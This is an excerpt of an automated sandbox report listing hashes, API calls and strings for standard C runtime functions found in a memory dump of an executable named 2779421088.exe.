                                                                                                                                                                                                                                                    • Opcode ID: 5e74459749e2eb15363a981359530bbb41103ff38f7e1ae32e8ba962585e38b2
                                                                                                                                                                                                                                                    • Instruction ID: 7dc6c381d5811fd992d3a1fe47def15e5d957f9805c6a1fa33c807134d6d80de
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e74459749e2eb15363a981359530bbb41103ff38f7e1ae32e8ba962585e38b2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96312975D0521C9BDB20DFA4DD89BDCBBB8BF08304F1040AAE44DAB250EB755A84DF44
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F6CDEB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                                                                    • Opcode ID: 8ffaeae6ebb8ce44e0b1979794137af8652d54f793292d7bd3dba4d18d7cafd5
                                                                                                                                                                                                                                                    • Instruction ID: a3a34612a8cd7f0956eb66ff35f9b927e773e5bff8177c95e25db39aa42382f7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ffaeae6ebb8ce44e0b1979794137af8652d54f793292d7bd3dba4d18d7cafd5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3516AB1E112099FEB14CF99D8D57AABBF0FB48320F24812AD485EB250D3B59940DF90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00F6E960
                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00F6EA6E
                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00F6EBC0
                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00F6EBDB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                    • Opcode ID: 33b841c2b1a7e8b973bd66d6781143f1138d38b80f95528903f586402f69449d
                                                                                                                                                                                                                                                    • Instruction ID: d20acb434f56b5db1a805d9130b79d3a4c4a042829265413f9be6188fb9fd372
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33b841c2b1a7e8b973bd66d6781143f1138d38b80f95528903f586402f69449d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFB18C3AD00209EFCF15DFA4C8819AEBBB5FF54320F14455AE8116B212D739EA51EF91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 00F6C04D
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,00000008,00000001,?,00000000), ref: 00F6C069
                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 00F6C090
                                                                                                                                                                                                                                                    • ___from_strstr_to_strchr.LIBCMT ref: 00F6C118
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(?,00000000,00000000,?,00000000), ref: 00F6C1E4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap_strlen$AllocFree___from_strstr_to_strchr
                                                                                                                                                                                                                                                    • String ID: !?#$%&()*+-,/:;<>=@[\]^`{|}~
                                                                                                                                                                                                                                                    • API String ID: 355428601-2271055266
                                                                                                                                                                                                                                                    • Opcode ID: 5f5c6271ee5b8229156ad417ed8f12aa467ea739950fa774d9fc17274302b01a
                                                                                                                                                                                                                                                    • Instruction ID: 991d5e61f77755a0a00926ab5e6e64f03cb52abcca6d854ce8cb7b23bfa658e1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f5c6271ee5b8229156ad417ed8f12aa467ea739950fa774d9fc17274302b01a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA5136769082449FE320DE29C8407BAB7E6EF57764F94051EE9C1CB203D325ED06ABC5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F6D977
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00F6D97F
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F6DA08
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00F6DA33
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F6DA88
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 1a74b23ad3ece7b71617949816e86c973411c2ca6c1becb6768e039740b44424
                                                                                                                                                                                                                                                    • Instruction ID: fba1349f99565043b483d636cf4fdc84eebf940d85be02854ad8d851625f0906
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a74b23ad3ece7b71617949816e86c973411c2ca6c1becb6768e039740b44424
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9041E430F04209ABCF10DF69CC85AAE7BB5AF45324F148155E819AB392D735D912EF91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00F6DE88,00F6DCBC,00F6CD15), ref: 00F6DE9F
                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F6DEAD
                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F6DEC6
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00F6DE88,00F6DCBC,00F6CD15), ref: 00F6DF18
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                    • Opcode ID: 1e4c22e683458f6051b3ce9ad0971c98bc4ea45a50d1e29bc78371734cc425a4
                                                                                                                                                                                                                                                    • Instruction ID: 5d4189e31c8e4ab654f039dce918fe17e791b8d9e9c47ff4c6cce75f83fc7be2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e4c22e683458f6051b3ce9ad0971c98bc4ea45a50d1e29bc78371734cc425a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D801D437F09319AEA61426B4ACC557A37A4DB62774B20032EF525990E1EF668C06B741
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\2779421088.exe, xrefs: 00F72029
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\2779421088.exe
                                                                                                                                                                                                                                                    • API String ID: 0-2246690760
                                                                                                                                                                                                                                                    • Opcode ID: b3654338dde0175994fccacb92c280b646fe671e13268af27f2a383f37f64800
                                                                                                                                                                                                                                                    • Instruction ID: c14b0d65cc942f311b74509ff2e7fe3e2c4f5df5424a5db7e5fb1c6740be55ab
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3654338dde0175994fccacb92c280b646fe671e13268af27f2a383f37f64800
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79218BB1600206AF9B60AF69CC819AB77A9AF50364710C51BF91DD7151EB34EC90E7B2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E62508BC,?,?,00000000,00F78ADF,000000FF,?,00F6FFFA,00F700DE,?,00F6FFCB,00000000), ref: 00F70053
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F70065
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,00F78ADF,000000FF,?,00F6FFFA,00F700DE,?,00F6FFCB,00000000), ref: 00F70087
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: 1fa8989239e70ddd03d60337b78bc5d912f5f67fd524fe066a05ab01aa404e76
                                                                                                                                                                                                                                                    • Instruction ID: 2afee206098d061f4b7d127e7cf0b8995368d1fdd7a56e8bbf0673deff91c951
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fa8989239e70ddd03d60337b78bc5d912f5f67fd524fe066a05ab01aa404e76
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D016731A4465DEFDB119F50DC09FFEB7B9FB08724F044626E812A2690DBB59900DF51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00F6E064,00000000,?,00FBB528,?,?,?,00F6E207,00000004,InitializeCriticalSectionEx,00FB2CC0,InitializeCriticalSectionEx), ref: 00F6E0C0
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00F6E064,00000000,?,00FBB528,?,?,?,00F6E207,00000004,InitializeCriticalSectionEx,00FB2CC0,InitializeCriticalSectionEx,00000000,?,00F6DF87), ref: 00F6E0CA
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00F6E0F2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                    • Opcode ID: d2073e8c36b34a76beaded7a3342bca028cfb661178537925272c97701cce11d
                                                                                                                                                                                                                                                    • Instruction ID: a7ac5b3aeb8b1053b44ca1aa191ffc97e5dd3db5aed3fd6b8b408983aae8352a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2073e8c36b34a76beaded7a3342bca028cfb661178537925272c97701cce11d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76E01A31788309B6EF211B61ED06BA83A69AB10B61F244020FA0DE90A1DBE5D860AA45
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(E62508BC,00000000,00000000,?), ref: 00F7560C
                                                                                                                                                                                                                                                      • Part of subcall function 00F72BDB: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F70D4D,?,00000000,-00000008), ref: 00F72C3C
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F7585E
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F758A4
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00F75947
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2112829910-0
                                                                                                                                                                                                                                                    • Opcode ID: 21ba44b1e8bbdad381574b0a92239d0e67d28217b252380332035ebe4bd85fc9
                                                                                                                                                                                                                                                    • Instruction ID: 7075a7eb7f027ab8e43a37046961e1b9495c7ed0b484dd0687efaf9063ad305e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21ba44b1e8bbdad381574b0a92239d0e67d28217b252380332035ebe4bd85fc9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6ED18CB5D04648DFCB14CFA8D880AEDBBB5FF08720F24812AE55AEB351D770A942DB51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                    • Opcode ID: a404c61f0fe11e8b48edf149d0c963a913a3d23da0e62350d4eec6ca9ac10af4
                                                                                                                                                                                                                                                    • Instruction ID: 83a5241c30675c277028a2d819a4c9c3d2c162c52e45b25aabd612424fc0c2b7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a404c61f0fe11e8b48edf149d0c963a913a3d23da0e62350d4eec6ca9ac10af4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C251237BA14206AFDB288F10D941BBAB7A4FF54320F14452DEC164B291E736EC51FB90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00F72BDB: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F70D4D,?,00000000,-00000008), ref: 00F72C3C
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00F7190D
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00F71914
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00F7194E
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00F71955
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                                                                                                                    • Opcode ID: f6cb5e8e2ae2a18d7a75f49bcb7481ab63d77572cba20249944cbdc9359a5daf
                                                                                                                                                                                                                                                    • Instruction ID: f2d52673d5c85ce307970d7746aae98c510f68ad810b830747fe6633541a3954
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6cb5e8e2ae2a18d7a75f49bcb7481ab63d77572cba20249944cbdc9359a5daf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE21D331A00205AFDB10AFA9CC9196BB7B9FF40334710C52AF91DD7240DB34ED49A7A2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00F72C86
                                                                                                                                                                                                                                                      • Part of subcall function 00F72BDB: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F70D4D,?,00000000,-00000008), ref: 00F72C3C
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F72CBE
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F72CDE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 158306478-0
